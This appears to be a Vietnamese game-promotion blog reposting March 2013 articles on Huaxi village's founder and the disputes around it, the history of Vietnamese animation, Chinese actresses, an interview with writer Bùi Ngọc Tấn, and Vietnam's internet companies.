Thứ Bảy, 30 tháng 3, 2013

Trung Quốc tranh cãi về “Thiên hạ đệ nhất thôn”

Các game thủ Đại hiệp truyện kính mến!

Trung Quốc tranh cãi về “Thiên hạ đệ nhất thôn”

Ngô Nhân Bảo, người được mệnh danh là Nông dân số 1 Trung Quốc vừa qua đời. Ông là người có công đưa thôn Hoa Tây trở thành Thiên hạ đệ nhất thôn, tỉnh Giang Tô, hay “làng trăm triệu” đầu tiên ở Trung Quốc với nhiều tranh cãi.

Máy bay đưa tiễn người nông dân số 1 Trung Quốc

Ngày 22-3 vừa qua, đám tang của Ngô Nhân Bảo – sinh năm 1928, Anh hùng lao động – Nông dân số 1 Trung Quốc (Trung Quốc đệ nhất nông dân), người sáng lập và là Bí thư đảng ủy, Chủ tịch HĐQT của Tập đoàn Hoa Tây thôn – “Thiên hạ đệ nhất thôn” từ năm 1957 đến 2003, đã được tổ chức trọng thể với hàng vạn người tham gia.


Đoàn xe tang đưa tiễn ông Ngô Nhân Bảo.
Trong hội trường được thiết kế mô phỏng Đại lễ đường nhân dân, một bức chân dung khổng lồ của Ngô Nhân Bảo được treo ở giữa linh đường, phía dưới là vòng hoa của rất nhiều nhà lãnh đạo Trung Quốc như Du Chính Thanh, Lý Nguyên Triều, Hồ Cẩm Đào, Ôn Gia Bảo, Lý Bằng, Kiều Thạch…Một chiếc trực thăng bay lượn phía trên đoàn xe 20 chiếc kết hoa đưa tiễn con người đã tạo ra “thiên đường XHCN” nằm trong quan tài được phủ quốc kỳ và hoa tươi về nơi an nghỉ cuối cùng. Nhiều dân làng mang theo biểu ngữ ca ngợi ông Ngô, không ít người bật khóc …


Tại Lễ truy điệu được Tân Hoa xã và các báo lớn đưa tin với vị trí trang trọng, Tưởng Hồng Lượng, Bí thư thành ủy Giang Âm, tỉnh Giang Tô đọc điếu văn ca ngợi Ngô Nhân Bảo là “đảng viên ưu tú, đại biểu kiệt xuất của cán bộ nông thôn thời nay, người vĩ đại tìm tòi, mở ra, đi đầu thực thi con đường xây dựng nông thôn mới XHCN”.

Bản tin của Tân Hoa xã cũng xác nhận: Bí thư Hoa Tây hiện nay Ngô Hiệp Ân là con trai thứ 4 của Ngô Nhân Bảo, người chính thức kế nhiệm cha từ 2003. Từ 2003 đến nay, ông nhường chức cho con trai, lui về làm phó, qua đời vì ung thư ngày 18-3 vừa qua. Cho đến tận khi qua đời, Ngô Nhân Bảo vẫn là nhân vật “linh hồn” của Hoa Tây.

Người tạo nên “Huyền thoại Hoa Tây”

Ngay từ năm 2006, cuốn Ngô Nhân Bảo truyện của NXB Nhân dân, bộ phim truyền hình Câu chuyện làng Hoa Tây và phim nhựađã được phát hành, dân chúng Trung Quốc dần dần biết đến cái tên Hoa Tây cùng câu chuyện của nó.

Ngay từ năm 1961, khi cả Trung Quốc đang ở trong thời kỳ đói khát, Bí thư chi bộ thôn Hoa Tây Ngô Nhân Bảo đã lặng lẽ mở các xưởng gia công, xí nghiệp nhỏ để kiếm tiền, chính chúng là cơ sở cho việc phát triển các xí nghiệp hương trấn và mô hình phát triển kinh tế Nam Giang tô lừng danh sau này.

Hiện nay, Hoa Tây diện tích gần 16 cây số vuông với hơn 17 ngàn dân, tất cả đều sống trong các biệt thự với tiện nghi đầy đủ, có xe hơi, mỗi gia đình đều có số dư tiết kiệm 6 chữ số (triệu NDT).

Nhà văn chuyên viết về đề tài kinh tế Ngô Hiểu Ba từng viết về Ngô Nhân Bảo: “Khi lớn tiếng hô hào “học tập Đại Trại”, nhưng Ngô Nhân Bảo lại lén lút làm những việc trái phép thời đó. Từ 1969 ông đã điều 20 người lén lút mở xưởng ngũ kim; năm 1978 vốn liếng của Ngô ở Hoa Tây đã có tới 1 triệu tệ cộng với 1 triệu gửi ngân hàng cùng kho lương thực dự trữ đủ ăn 3 năm cho cả làng, giàu nhất trong số hàng vạn làng cả Trung Quốc thời đó”.

Năm 1980, Trung Quốc đẩy mạnh mở cửa với bên ngoài, Ngô Nhân Bảo lại kiên trì phát triển kinh tế tập thể ở thôn làng, đưa công nghiệp trở thành nền tảng để kinh tế Hoa Tây phát triển.

Năm 1989, Hoa Tây trở thành “Làng trăm triệu đầu tiên”. Sang thập kỷ 1990, sau khi “Đặng Tiểu Bình nam tuần”, kinh tế Hoa Tây đã cất cánh, đến 2010 tổng số vốn của toàn thôn đạt 16 tỷ NDT, có hơn 60 xí nghiệp trực thuộc, tổng giá trị sản lượng vượt 50 tỷ NDT. Làng Hoa Tây trở thành công ty cổ phần, dân làng là nhân viên đồng thời là các cổ đông.

Trong làng dần dần xuất hiện các công trình như Tháp vàng Hoa Tây, Khách sạn 5 sao Long Hy cao 328 mét, Bò Vàng – biểu tượng của thôn; ngoài ra còn có hàng loạt các công trình kiến trúc như Nhà quốc hội Mỹ, Nhà hát Opera Sydney, Cố Cung, Thiên An Môn được “nhân bản”.

Báo Đô thị Nam Phương trong một bài phỏng vấn Ngô Nhân Bảo năm 2011 đã khẳng định, con người Ngô còn lưu giữ nhiều đặc điểm của thời Mao Trạch Đông, thích trương khẩu hiệu, thích các hoạt động lễ lạt linh đình.

Tranh cãi về thiên đường Hoa Tây

Khi Ngô Nhân Bảo qua đời, các báo chí chính thống của Trung Quốc đều dành những vị trí trang trọng đăng tải những bài dài viết về thân thế, ca ngợi sự nghiệp của ông, nhưng rất ít đề cập đến các vấn đề phức tạp của Hoa Tây như quyền sở hữu cổ phần, quan hệ sản xuất, dân thôn tự trị…


Bò vàng ở Hoa Tây thôn.
Ngô Nhân Bảo vừa nằm xuống, trên mạng đã xuất hiện những ý kiến trái chiều về “thiên đường Hoa Tây”, như “Dưới ánh hào quang, Hoa Tây là một nhà tù, thử hỏi chúng ta ai muốn chui vào đó?”, “Hoa Tây chính là công xã nhân dân thủa trước, chỉ khác là hiện nay làng được hưởng thành quả của công nghệ cao và mặt tốt của chính sách nhà nước cho phép một bộ phận người giàu trước. Cũng giống như mô hình Trùng Khánh, mô hình Hoa Tây không thể nhân rộng”.

Giáo sư Vương Tư Tưởng,Đại học Hà Nam có bài “Cái chết của Ngô Nhân Bảo liệu có cứu được làng Hoa Tây?”, bày tỏ cá nhân ông luôn giữ thái độ phủ định đối với Hoa Tây.

Thôn Hoa Tây có các công trình như Tháp vàng Hoa Tây, Khách sạn 5 sao Long Hy cao 328 mét, Bò Vàng – biểu tượng của thôn; ngoài ra còn có hàng loạt các công trình kiến trúc như Nhà quốc hội Mỹ, Nhà hát Opera Sydney, Cố Cung, Thiên An Môn được “nhân bản”. Các biệt thự ở đây giống nhau, các xe hơi cùng loại được cấp phát khiến dân làng thường vào nhầm nhà, lên nhầm xe nhau.

Ông cho rằng Hoa Tây là hình ảnh thu nhỏ của Trung Quốc hiện nay. Ở đó, tiền bạc trở thành tiêu chuẩn duy nhất để đánh giá thành bại; cách kiếm tiền ở đó theo “thuyết con Mèo”, tức bất kể mèo Đen hay Trắng, cứ bắt được chuột đều là Mèo tốt, không có vấn đề bản quyền, tiêu chuẩn đạo đức, hay trật tự khai thác tài nguyên. Phân phối của cải cũng bình quân theo đầu người.
Ông Vương còn viết, ở Hoa Tây, bất cứ dân làng nào bày tỏ nghi ngờ về gia đình họ Ngô đều bị đàn áp; quyền lực trong làng đều do gia đình Ngô Nhân Bảo nắm giữ và truyền lại cho nhau. Hiện nay 22 người trong gia đình này đang khống chế cả khối tài sản khổng lồ.

Nhà sử học nổi tiếng Chương Lập Phàm coi đây là một kiểu thế lực tôn tộc trong lịch sử, một kiểu cường hào địa phương, “quốc gia trong quốc gia”…

Sau khi Ngô Nhân Bảo qua đời, phóng viên Tân Kinh báo Bắc Kinh đã phỏng vấn Ngô Hải Yến, thư ký cho Ngô Nhân Bảo suốt thời gian dài. Ngô Hải Yến phủ nhận việc Hoa Tây hiện đang được quản lý kiểu gia tộc.

Nhưng một điều không thể phủ nhận là các hậu duệ của Ngô Nhân Bảo đang nắm giữ các vị trí quan trọng: Con thứ tư Ngô Hiệp Ân làm Bí thư kiêm Chủ tịch HĐQT tập đoàn thay cha, con cả Ngô Hiệp Đông, con thứ Ngô Hiệp Đức là Phó Bí thư, con thứ ba Ngô Hiệp Bình là Ủy viên thường vụ, con gái Ngô Phụng Anh và con rể Liêu Hồng Đạt đều là UV thường vụ. Các cháu trai, cháu gái, cháu dâu, cháu rể của Ngô Nhân Bảo hết thảy đều giữ các chức vụ quan trọng trong thôn và cả trên thành phố.

Đại Hiệp Truyện
Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình

Thứ Năm, 28 tháng 3, 2013

Phim Hoạt hình Việt Nam khoảng khắc khó quên


Các game thủ Đại hiệp truyện kính mến!

Phim Hoạt hình Việt Nam khoảng khắc khó quên

Tháng 6/1960, bộ phim hoạt họa đầu tiên Đáng đời thằng Cáo ra mắt người xem, đánh dấu sự khai sinh một loại hình nghệ thuật mới tại nước ta – điện ảnh Hoạt hình Việt Nam.

Đồng chí Trường Chinh đến thăm Xưởng phim hoạt hình năm 1973

Tháng 4/1977, tại LHP Việt Nam lần thứ IV, bộ phim hoạt họa màu Cây chổi đẹp nhất của Xưởng phim tổng hợp thành phố Hồ Chí Minh đã dự thi và giành được Bông sen Bạc. Đến tháng 6/1981, riêng Xí nghiệp phim hoạt hình Hà Nội đã sản xuất đến bộ phim thứ 95, còn Xưởng phim hoạt họa thành phố Hồ Chí Minh đã làm được 22 bộ phim hoạt họa, cắt giấy.

21 năm với ngót 120 bộ phim được làm ra, hàng năm, cả 2 cơ sở hoạt hình đã sản xuất được đến 16 phim – thật là một con số chỉ có trong mơ.

Thời kỳ mở Lớp thực tập hoạt họa (1959 - 1964) là thời kỳ đào tạo đội ngũ, tìm hiểu và xây dựng các thể loại phim hoạt hình. Bộ phim vẽ của Lớp thực tập hoạt họa Đáng đời thằng cáo, một số họa sỹ có nhiệt tình đã tìm tòi và thể nghiệm một loại phim mới – phim giấy cắt có tên Con một nhà nói về giá trị các loại cây lương thực là ngô, khoai, sắn… (1961, đạo diễn Trương Qua, họa sỹ Lê Huy Hòa). Năm 1962, một loại phim mới xuất hiện – phim búp bê Chú thỏ đi học (đạo diễn Nguyễn Tích, họa sỹ Ngô Đình Chương, quay phim Đỗ Trần Hiệt) dựa theo ngụ ngôn dân gian “rùa nhanh hơn thỏ”.

Các thế hệ hoạt hình Việt Nam

Những bộ phim hoạt hình đầu tiên này không tránh khỏi sự non yếu về tay  nghề, nhưng điều đáng hoan nghênh là sự mạnh dạn tìm tòi, cố gắng thể hiện các hình thức đó lên màn ảnh. Một số phim làm sau đó đã có chất lượng khá hơn, như Chiếc vòng bạc (1962, đạo diễn Trương Qua), như Cây khế (đạo diễn Nguyễn Tích), những phim hoạt họa như Giấc mơ hoa (1963, đạo diễn Hoàng Sùng) hoặc Đêm trăng rằm (đạo diễn Trương Qua, 1964). Đề tài kháng chiến chống Mỹ, vấn đề nóng hổi của đất nước trở thành nguồn thôi thúc sáng tác của anh em làm phim. Dựa vào truyện phim đèn chiếu từ miền Nam gửi ra, đạo diễn Lê Minh Hiền đã đưa lên màn ảnh hoạt họa chuyện hai anh em nhỏ dùng tổ ong rừng tấn công lũ giặc Mỹ - ngụy mang tên Binh ong, mở đầu loạt phim đả kích – chính trị.

5 năm đầu tiên, Xưởng đã làm được 16 phim các loại hoạt họa, búp bê, cắt giấy với  nhiều thể tài phong phú. Nét chung của thời kỳ này là sự tìm hiểu những phương tiện diễn đạt nghệ thuật bằng tiếng nói của tạo hình và diễn xuất. Tuy còn có những mặt yếu và hình thức nghệ thuật, nhưng đó là những phim có nội dung rõ ràng, có hình tượng dễ hiểu và bộ lộ nhiệt tình tìm tòi của tác giả. Đó là điều kiện quan trọng chuẩn bị cơ sở cho thời sau của hoạt hình.

Những năm kháng chiến chống Mỹ cứu nước gian khổ và ác liệt là thời kỳ phát triển mạng mẽ của hoạt hình Việt Nam. Lúc đó, Xưởng phim Hoạt họa phải sơ tán về các vùng nông thôn thiếu thốn phương tiện làm việc.., nhưng sản xuất không bị ngừng trệ, trái lại được nâng cao về mặt thể hiện nghệ thuật.

Phim Mèo con (theo truyện Nguyễn Đình Thi, biên kịch Nguyễn Thế Hội, đạo diễn Ngô Mạnh Lân, họa sỹ Lưu Đức) phải làm trong điều kiện khó khăn như vậy. Bộ phim được dư luận đánh giá cao không những ở tư tưởng của chuyện chú mèo nhỏ bé dám đương đầu quyết liệt và biết đánh thắng lão chuột độc ác, mà còn ở trình độ thể hiện của tác phẩm. Tiếp theo, một loạt phim đồng thoại có chất lượng đã ra đời như Những chiếc áo ấm (1968, đạo diễn Ngô Mạnh Lân), Gà trống hoa mơ (1971, đạo diễn Hồ Quảng), Ong, Bướm, Kiến (1972, đạo diễn Đỗ Trần Hiệt), Cá sấu ngứa răng (1974, đạo diễn Hoàng Thái), Rừng hoa (1974, đạo diễn Ngô Mạnh Lân), Tôm nhỏ và Hải quỳ (đạo diễn Nghiêm Dung) v.v và v.v

Đại Hiệp Truyện
Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình

Thứ Ba, 26 tháng 3, 2013

4 mỹ nhân Hoa ngữ lột xác từ ngây thơ đến sắc sảo


Các game thủ Đại hiệp truyện kính mến!

4 mỹ nhân Hoa ngữ lột xác từ ngây thơ đến sắc sảo

Để lại ấn tượng đẹp ban đầu trong lòng người hâm mộ nhờ vai thục nữ, hiền lành, nhưng Phạm Băng Băng, Lâm Tâm Như, Lưu Diệc Phi và Tôn Lệ dần thay đổi để trở nên sắc sảo, quyến rũ hơn.

1. Tôn Lệ

Khi 5 tuổi, Tôn Lệ đã được gia đình cho đi học múa để phần nào phát triển năng khiếu nghệ thuật. Khi hơn 10 tuổi, cô cùng đoàn múa thiếu nhi tham gia biểu diễn tại nhiều nước trên thế giới và nhờ đó, cô dần hình thành sự tự tin khi biểu diễn trước đám đông.

Năm 19 tuổi, Tôn Lệ được chọn đảm nhận vai nữ chính trong bộ phim truyền hình Ngọc Quan Âm nhờ vẻ ngoài xinh đẹp, đáng yêu. Sau khi bộ phim lên sóng, cô bỗng trở thành diễn viên trẻ triển vọng được đông đảo khán giả yêu mến. Tiếp đó, cô tiếp tục ghi dấu ấn với các nhân vật có vẻ đẹp trong sáng, đáng yêu qua các bộ phim như Dưới ánh mặt trời, Hạnh phúc tựa như hoa, Mật ngọt, Tân bến Thượng Hải...

Tôn Lệ thực sự có bước đột phá hình tượng với vai diễn trong bộ phim nổi đình nổi đám Hậu cung Chân Huyên truyện. Nữ diễn viên đã thể hiện ấn tượng nhân vật Chân Huyên - từ một cô gái dịu hiền thành một người mạnh mẽ, sắc sảo để có thể sinh tồn trong chốn hậu cung nhiều ganh đua, tranh đấu.



2. Lâm Tâm Như

Từ vai diễn Hạ Tử Vy trong Hoàn Châu cách cách đến các bộ phim khác như Tân dòng sông ly biệt, Âm thanh của sắc màu, Bán sinh duyên... Lâm Tâm Như vẫn chủ yếu thể hiện những cô gái khả ái, dịu hiền. Đến Bảng phong thần 2, nữ diễn viên mới có sự "lột xác" hoàn toàn khi hóa thân thành ác nữ. Ngoài ra, người đẹp xứ Đài cũng được khán giả khen ngợi hết lời khi hóa thân thành nàng Đậu Y Phòng thiện lương, tốt bụng nhưng nhiều tâm cơ trong Mỹ nhân tâm kế.

Mấy năm trở lại đây, Lâm Tâm Như dần được biết đến vai trò nhà sản xuất phim. Những bộ phim cô bỏ vốn sản xuất như Khuynh thế hoàng phi hay Tỷ tỷ tiến lên đều đạt thành công về mặt tỷ suất bạn xem đài.



3. Lưu Diệc Phi

Từ Vương Ngữ Yên trong Thiên long bát bộ, Triệu Linh Nhi trong Tiên kiếm kỳ hiệp truyện đến Tiểu Long Nữ trong Thần điêu đại hiệp, Lưu Diệc Phi luôn khiến khán giả mê đắm với vẻ đẹp trong sáng tựa nữ thần. Những năm gần đây, cùng với việc chuyển hướng tập trung phát triển sự nghiệp trên màn ảnh rộng, cô cũng dần thử sức với nhiều hình tượng mới, chẳng hạn như nhân vật Kim Yến Tử mạnh mẽ trong Vua kungfu hay vai diễn nữ sát thủ Linh Thư trong Đồng tước đài.  



4. Phạm Băng Băng

Phạm Băng Băng là diễn viên Hoa ngữ 8X có sự nghiệp phát triển đáng nể phục nhất. Từ vai phụ - cô a hoàn Kim Tỏa trong Hoàn Châu cách cách, cô nàng vươn lên hàng ngũ ngôi sao hạng A, thậm chí tên tuổi còn vượt xa ngoài biên giới Trung Quốc. Những năm đầu trong sự nghiệp, Phạm Băng Băng thường hóa thân thành các dạng vai trẻ trung, nhí nhảnh. Tuy nhiên mấy năm trở lại đây, cô diễn đa dạng các loại vai từ chính diện đến phản diện.



Đại Hiệp Truyện
Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình

Sung sướng thay là những kẻ có niềm tin


Đại hiệp truyện

Sung sướng thay là những kẻ có niềm tin

 Nhà văn Bùi Ngọc Tấn vừa có cuộc giao lưu với bạn đọc chủ đề Tìm lại thời gian đã mất trong không gian phố cổ Hà Nội.Trước đó, ông gặp lại đồng nghiệp thân thiết đủ các thế hệ ở báo Tiền Phong nhân 26/3. Phóng viên hỏi chuyện ông, nhân chuyến đi ý nghĩa từ Hải Phòng về Hà Nội.


Độc giả đến với buổi giao lưu “Tìm lại thời gian đã mất”. Ảnh: NGUYỄN ĐÌNH TOÁN.
So với cái thời “Mọi người nhìn tôi không ra quen không ra lạ, không ra chào không ra không/Mọi người nhìn tôi như thể mọi thứ đã kết thúc rồi”, có thể nói hiện Bùi Ngọc Tấn đang ở đỉnh cao hạnh phúc? Và ông có thấy bất ngờ trước những câu hỏi mà những người trẻ đặt ra cho ông tối 15/3 trong cuộc giao lưu ở quán cà phê Manzi, về lẽ sống, niềm tin, về những sai lầm trong quá khứ, về việc họ rút ra bài học cho mình từ bài học của Dương Tường, Bùi Ngọc Tấn, Châu Diên rằng “sống phải có lý tưởng và phải sáng suốt trong việc định ra những giá trị”?

Trước đây do ít tiếp xúc với lớp trẻ nên khi về già tôi có một mối lo, một nỗi sợ thì đúng hơn: Sợ lớp trẻ không biết được những gì lớp U 30 (sinh ra những năm 1930) chúng tôi đã sống, đã trải qua. Và như vậy thì thật đau đớn cho họ, những người “sắp đi qua hành tinh này mà không để lại một vết xước nào”.

Cho đến năm 1997, khi làm bộ phim về nhà thơ Lê Đại Thanh, tiếp xúc với các bạn trẻ cùng làm phim, nỗi sợ ấy đã hoàn toàn biến mất. Một niềm vui lớn của tôi!

Lớp trẻ sau chúng tôi một thế hệ ấy (lớp cha-con) hoàn toàn hiểu được chúng tôi, chia sẻ với chúng tôi. Tôi đã bảo Giang Lương Hà, Nguyễn Năng, những đồng tác giả của phim: “Thu hoạch lớn nhất của chú, cái được lớn nhất của chú trong khi làm phim là hiểu được các cháu, là biết rằng thế hệ các cháu hoàn toàn hiểu bọn chú”.

Ngày xưa chúng tôi tràn đầy lạc quan, tin tưởng, đến nỗi lỗi của mình là đã tin tưởng quá. Còn bây giờ, tôi thấy thương các con vì dường như chúng chẳng biết tin vào cái gì. Người Pháp có câu “sung sướng thay là những kẻ có niềm tin

Nhà văn bùi Ngọc Tấn

Và sau này là những bạn đọc trẻ tới nhà. Mới Tết năm ngoái (2012) thôi, một cháu gái (thế hệ thứ 2 sau chúng tôi, thế hệ ông-cháu) từ Hà Nội về (cùng các anh Nguyên Ngọc, Dương Tường, Chu Hảo, Nguyễn Quang A, Vũ Quần Phương…) bảo tôi: “Mấy quyển Anna chú phải giữ cẩn thận đấy chú nhé”. Ý cháu muốn nói tới mấy tập sách đã theo tôi vào tù. Không cần bình luận gì thêm về lời dặn ấy. Nó găm vào trí nhớ tôi.
Rồi đến buổi gặp ở Manzi tối 15/3 vừa qua. Một bạn đọc còn rất trẻ mang gần như tất cả các đầu sách của tôi đến để tôi ký.

Tôi không bất ngờ trước các câu hỏi của lớp trẻ đặt ra cho chúng tôi về lẽ sống niềm tin, những sai lầm trong quá khứ, về những điều cần phải có trong cuộc sống. Tôi hiểu họ, yêu quý họ và tin chắc một điều: Sự chia sẻ giữa các thế hệ là tuyệt đối. Điều ấy làm chúng tôi yên tâm sống và thanh thản đi… về thế giới bên kia.



“Nếu có bị cuộc đời cho đo ván thì cũng đừng để mất hết” (Bùi Ngọc Tấn khuyên bạn trẻ, tại café Manzi 15/3).
Và so với cái thời mà một loạt nước XHCN kiểm điểm nước nào xem nhiều nhất phim “Số phận con người” (theo truyện của Solokhov); những phim “Đàn sếu bay”, “Bài ca người lính” bị cấm chiếu ngay ở quê hương do cái án quy chụp “gây tâm lý sợ hãi chiến tranh” (như ông vừa mới hồi ức), thì không khí hiện nay khác hẳn? Ông nghĩ ông còn muốn nó khác đến bậc nào nữa?

Cuộc sống hôm nay có những bước tiến bộ đáng kể so với cái thời thi chiếu, thi xem phim Số phận con người, rồi lại lên án nó. Nhưng đã nửa thế kỷ rồi. Gọi là cuộc sống có nhích lên. Nhích lên chút ít. Đáng buồn là như vậy. Hai ông nhà báo đi làm phận sự bị đánh mà không dám nhận là mình bị đánh, không dám “ẳng lên một tiếng” như người ta đã viết. Về chủ đề này có đến cả chục ngàn dẫn chứng, trăm ngàn ví dụ.

Cuộc sống đã có nhiều tiến bộ. Nhưng sự không dám nói thật, sự dối trá vẫn còn khá phổ biến. Điều đó ảnh hưởng rất lớn đến chất lượng sống, đến tiến bộ xã hội.

Cho tôi nói rõ một điều: Tôi căm thù sự giả dối, đặc biệt thói đạo đức giả.

Ông hẹn với bạn bè “phải sống dai, sống dai là thắng” và nay ở tuổi 79 ông kết luận“sống đến bây giờ là lãi rồi”. Gặt hái lớn nhất của cuộc đời Bùi Ngọc Tấn?

Tôi rất sợ chết mà chưa làm được những công việc cần làm, chưa hoàn thành dự định (như Nguyên Hồng chẳng hạn) thì quá buồn. Thật may mắn, những việc cần làm tôi đã làm hoặc đang hoàn thành.

Đúng là tôi sống đến bây giờ là lãi rồi. Tôi không ngờ về cuối đời lại được hưởng sự chia sẻ, đùm bọc như tôi đang hưởng.

Gặt hái lớn nhất của đời tôi ư?

Một là: Có được một đóng góp ít ỏi, nhỏ bé cho văn học.

Hai là: Tránh được cho người quen những lúng túng khi gặp tôi, chấm dứt tình trạng đã kéo dài nửa thế kỷ, như tôi nói ở trên: Không ra không nhìn thấy, không ra nhìn thấy, không ra chào, không ra không chào, chẳng là quen mà cũng không là lạ, nhìn tôi như nhìn một cái gì đã kết thúc rồi.

Ông vẫn chủ yếu đi về Hà Nội- Hải Phòng. Cảm nhận của ông về hai thành phố này, thời điểm hiện nay?

Tôi yêu Hà Nội, Hải Phòng của nửa thế kỷ trước với tình yêu của một chàng trai tuổi 20.

Một Hà Nội thanh bình, êm đềm, thanh lịch văn hiến, và trong veo không khí, tán lá những phố sấu dài như ôm ấp chở che.Hà Nội một thời để yêu, một thời để sống của tôi.

Và Hải Phòng tỉnh lẻ, tỉnh lẻ cô em nằm xem kiếm hiệp, tỉnh lẻ về bầu trời, về sự dèm pha tâng bốc. Tôi đã viết về Hải Phòng như vậy nhưng tôi yêu nó biết bao. Hoa phượng chẳng dính dáng gì đến tình yêu ấy dù nó đã được chọn là biểu tượng của thành phố Tháng năm rợp trời hoa phượng đỏ.

Hải Phòng xù xì lam lũ, lao động đổ mồ hôi, hồn nhiên, chân thật, phóng khoáng và cởi mở với những tên đất chỉ nghe cũng đã yêu: Ngõ sau Nhà Lốp, Nhà thờ Tây đen, bến tầu Tây Điếc, Ngõ ông Lý Phình… Hải Phòng với những ngôi nhà mới cửa sổ xanh mở đều một lượt / như một ban đồng ca cùng ngân giọng hát/ như những người bên nhau cùng mở rộng tâm hồn.

Hải Phòng, Hà Nội hôm nay, những cơ thể đang phát triển. Mờ đi những nét riêng. Hơn thế, rất giống nhau: Xô bồ, vội vã, giành giật…, ô nhiễm cả thành phố, cả mặt người.

Phát triển nhưng đầy lo âu.

Tôi trở thành xa lạ với Hà Nội và với cả Hải Phòng dù vẫn sống ở đó.

Có thể vì tôi đã 80 tuổi rồi chăng?
Đại Hiệp Truyện

Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình

Đâu là công ty Internet số 1 Việt Nam?


Game thống lĩnh

Đâu là công ty Internet số 1 Việt Nam?
ICTnews – Bài viết của blogger Nguyễn Ngọc Long - một người khá nổi tiếng trên mạng xã hội, đã nhìn các công ty dịch vụ Internet dưới nhiều góc độ để trả lời câu hỏi: Ai là công ty Internet số 1 Việt Nam? (ICTnews đã xin phép được biên tập và đăng lại).
Đầu tiên, cho phép người viết rào trước đón sau một chút, bài viết dưới đây hoàn toàn là quan điểm cá nhân, dựa trên việc cố gắng thu thập, phân tích, đánh giá và tổng hợp thông tin từ những gì người viết biết và thấy. Người viết hoàn toàn không phải CEO của FPT, VCCorp, VTC hay VNG để biết chiến lược của họ thực hiện thế nào?

Để trả lời câu hỏi, đâu là công ty Internet số 1 Việt Nam thì phải thống nhất với nhau là dựa trên tiêu chí gì để nhìn nhận và đánh giá? Doanh thu? Lợi nhuận? Số lượng người dùng hay traffic? Ở riêng trong bài viết này, người viết chỉ dựa trên chiến lược và việc phù hợp của chiến lược với xu hướng tương lai và tình hình hiện tại..

Như thông tin người viết được chia sẻ, số lượng người nghe nhạc trên Youtube đã vượt qua nhaccuatui, nhacso, nhacvui và ZingMP3; số lượng và chất lượng người dùng facebook chiến thắng tuyệt đối Zing Me; tìm kiếm thì chắc chắn không ai qua được Google. Riêng về khoản tin tức thì VnExpress của FPT đang là số 1, một sản phẩm hiếm hoi của Việt Nam.

Và có lẽ cũng chẳng cần phải kể thêm các lĩnh vực khác như Game online (VNG), Thương mại điện tử (5 giay, rongbay, enbac, vatgia)... vì thị trường online cục diện đã rõ ràng. Và theo người viết nhận định bây giờ là thời của mobile và thị trường đanh cạnh tranh khốc liệt, giống như chiến trường đang cực kỳ dữ dội, đầy tiếng súng trường, đại bác, bom B52 và chưa biết khi nào mới thôi đỏ lửa.

Tại sao cuộc chiến trên mobile lại quan trọng đến như vậy? Vì người viết cho rằng nếu ai chiến thắng ở mảng mobile, sẽ có sức mạnh cực lớn để thay đổi cục diến chiến trường trên Desktop.

Đầu tiên là VNG: Ngày hôm nay, VNG vừa hé lộ sản phẩm Zini, mà người viết nghĩ là thay cho Zing LIVE đã chết từ trước đó (?). Có thể dự đoán Zini là sản phẩm chiến lược và sống còn nhất của VNG trong cuộc chiến khốc liệt này. Nếu như đích đến cuối cùng mà Zini hướng tới là trở thành Weibo của Việt Nam.

Weibo là một sản phẩm mạng xã hội của nước láng giềng Trung Quốc. Có thể coi như trang chủ của tất cả mọi người sử dụng Internet ở Trung Quốc. Người ta vào Weibo để đọc thông tin nhiều hơn đọc báo chí chính thống. Cuối năm 2012, Weibo có khoảng 400 triệu trong khi wechat có khoảng 200 triệu người sử dụng toàn cầu.

Tại sao người ta lại vào Weibo nhiều hơn vào các trang báo để đọc thông tin? Tại vì Weibo là nơi mà người sử dụng có thể đọc được thông tin ở mọi tờ báo chính thống, đồng thời đọc được thông tin từ hàng triệu thành viên khác về chính chủ đề mà họ quan tâm. Một cách nhanh chóng, tức thời, không kiểm duyệt và đa dạng.

Có thể hình dung một cách "không đúng đắn lắm" thì Weibo = vnexpress + facebook + twitter + youtube (xét về mặt thông tin). Hay nói cách khác, nếu ai sở hữu được một sản phẩm như Weibo thì sẽ trở thành công ty Internet số 1 Việt Nam.

Để có được một sản phẩm như Weibo, công ty này cần có nguồn thông tin tức thời từ các báo chính thống, đồng thời phải có cả nguồn thông tin tức thời từ hàng triệu người sử dụng. Chẳng hạn như hiện tại, khi xảy ra vụ hỏa hoạn ở nhà ông Phương khói lửa, chúng ta phải lên các báo như VnExpress, Dân Trí, Tuổi Trẻ, Thanh Niên, VietnamNet... để tìm kiếm các bài báo viết về ông Phương khói lửa. Sau đó, tiếp tục lên các mạng xã hội như Facebook, Twitter (ít người dùng ở Việt Nam), các diễn đàn tập trung đông để "hóng" những ai đó đưa bài về ông Phương khói lửa. Tức là thông tin đang toán loạn ở khắp nơi.

Nếu có một sản phẩm như Weibo, chúng ta chỉ cần truy cập một kênh như kiểu #phương-khói-lửa để cập nhật mọi thông tin từ mọi nguồn đã nói ở trên.
 Và về khoản tổng hợp thông tin từ các báo chính thống, ở Việt Nam có một công cụ đang làm việc đó cực kỳ lợi hại, nhanh và chính xác. Đó là baomoi.com, hiện là đối tác chiến lược của VNG. Về khoản tổng hợp thông tin từ các diễn đàn thì có nhiều công cụ của nhiều công ty như vietbuzzad, noti5, clickz, boomerang, ORM, younet...Về khoản tổng hợp thông tin từ các mạng xã hội thì... hầu như không có! Trong thực tế, các công cụ tổng hợp thông tin kể trên đều có tính năng tracking dữ liệu trên các mạng xã hội nhưng theo đánh giá của người viết thì rất tệ. Chưa kể, trong trường hợp một trong số các công cụ này phát triển tới một ngưỡng nhất định sẽ bị các mạng xã hội như twitter, facebook...block lại không cho quét. Cho nên bị rơi vào tình thế "có cũng như không".

Noti5 thuộc sở hữu của ePi, đơn vị sở hữu baomoi.com. Cho nên có thể thấy trong cuộc chiến chạy đua trở thành Weibo, thì VNG đang là đơn vị có lợi thế lớn nhất khi vừa giải quyết được bài toán tổng hợp thông tin từ báo chí, vừa giải quyết được bài toán tổng hợp thông tin từ các diễn đàn. Họ chỉ thiếu duy nhất công cụ tổng hợp thông tin từ mạng xã hội.

